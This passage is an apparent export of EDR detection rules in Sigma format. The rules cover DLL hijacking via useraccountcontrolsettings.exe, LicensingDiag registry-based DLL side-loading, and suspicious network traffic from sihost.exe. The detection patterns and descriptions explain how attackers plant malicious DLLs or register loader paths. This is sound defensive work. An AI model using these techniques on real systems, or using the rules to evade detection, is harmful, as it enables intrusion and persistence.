"name": "t1574_001_dll_hijacking_useraccountcontrolsettings.yml",
"content": "title: DLL Hijacking via useraccountcontrolsettings.exe\nid: ff540b1f-d494-44b7-9446-7c0443c34d87\ndescription: |\n Detects potential Windows DLL Hijacking via useraccountcontrolsettings.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'useraccountcontrolsettings.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff540b1f-d494-44b7-9446-7c0443c34d87",
"rule_name": "DLL Hijacking via useraccountcontrolsettings.exe",
"rule_description": "Detects potential Windows DLL Hijacking via useraccountcontrolsettings.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff8c5702-d6ec-4d57-a6dc-8b3aa2a9d9d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094799Z",
"creation_date": "2026-03-23T11:45:34.094801Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/0gtweet/status/1827991604918890968",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_sideloading_licensing_diag.yml",
"content": "title: Possible LicensingDiag DLL Hijacking via Registry\nid: ff8c5702-d6ec-4d57-a6dc-8b3aa2a9d9d2\ndescription: |\n Detects LicensingDiag registry key being set.\n Adversaries can register different paths to this key for DLLs that will automatically get loaded when LicensingDiag.exe is launched.\n It is recommended to investigate the DLLs in the paths listed in this key. Specifically the exported InitializeCollector() function which will be called by LicensingDiag.\nreferences:\n - https://x.com/0gtweet/status/1827991604918890968\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/08/26\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LicensingDiag\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff8c5702-d6ec-4d57-a6dc-8b3aa2a9d9d2",
"rule_name": "Possible LicensingDiag DLL Hijacking via Registry",
"rule_description": "Detects LicensingDiag registry key being set.\nAdversaries can register different paths to this key for DLLs that will automatically get loaded when LicensingDiag.exe is launched.\nIt is recommended to investigate the DLLs in the paths listed in this key. Specifically the exported InitializeCollector() function which will be called by LicensingDiag.\n",
"rule_creation_date": "2024-08-26",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fff7590e-c14f-4958-bc97-138b82e6b832",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074062Z",
"creation_date": "2026-03-23T11:45:34.074065Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074070Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://live.paloaltonetworks.com/t5/blogs/diplomats-beware-cloaked-ursa-phishing-with-a-twist/ba-p/549960",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_sihost_suspicious_network_communication.yml",
"content": "title: Suspicious sihost.exe Network Communication\nid: fff7590e-c14f-4958-bc97-138b82e6b832\ndescription: |\n Detects network communications from sihost.exe.\n This can be the result of a communication with a C&C server after an adversary injects malicious code inside a legitimate process in order to evade process-based defenses.\n It is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://live.paloaltonetworks.com/t5/blogs/diplomats-beware-cloaked-ursa-phishing-with-a-twist/ba-p/549960\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2023/10/03\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.command_and_control\n - attack.t1571\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'sihost.exe'\n\n filter_dstport:\n DestinationPort: '135'\n\n filter_linklocal_ipv6:\n SourceIp: 'fe80::*'\n DestinationIp: 'fe80::*'\n\n filter_linklocal_ipv4:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - '100.64.0.0/10' # RFC6598\n\n exclusion_copytrans:\n # api.copytrans.net\n DestinationIp:\n - '52.47.178.141'\n - '54.149.145.98'\n DestinationPort: '443'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fff7590e-c14f-4958-bc97-138b82e6b832",
"rule_name": "Suspicious sihost.exe Network Communication",
"rule_description": "Detects network communications from sihost.exe.\nThis can be the result of a communication with a C&C server after an adversary injects malicious code inside a legitimate process in order to evade process-based defenses.\nIt is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2023-10-03",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}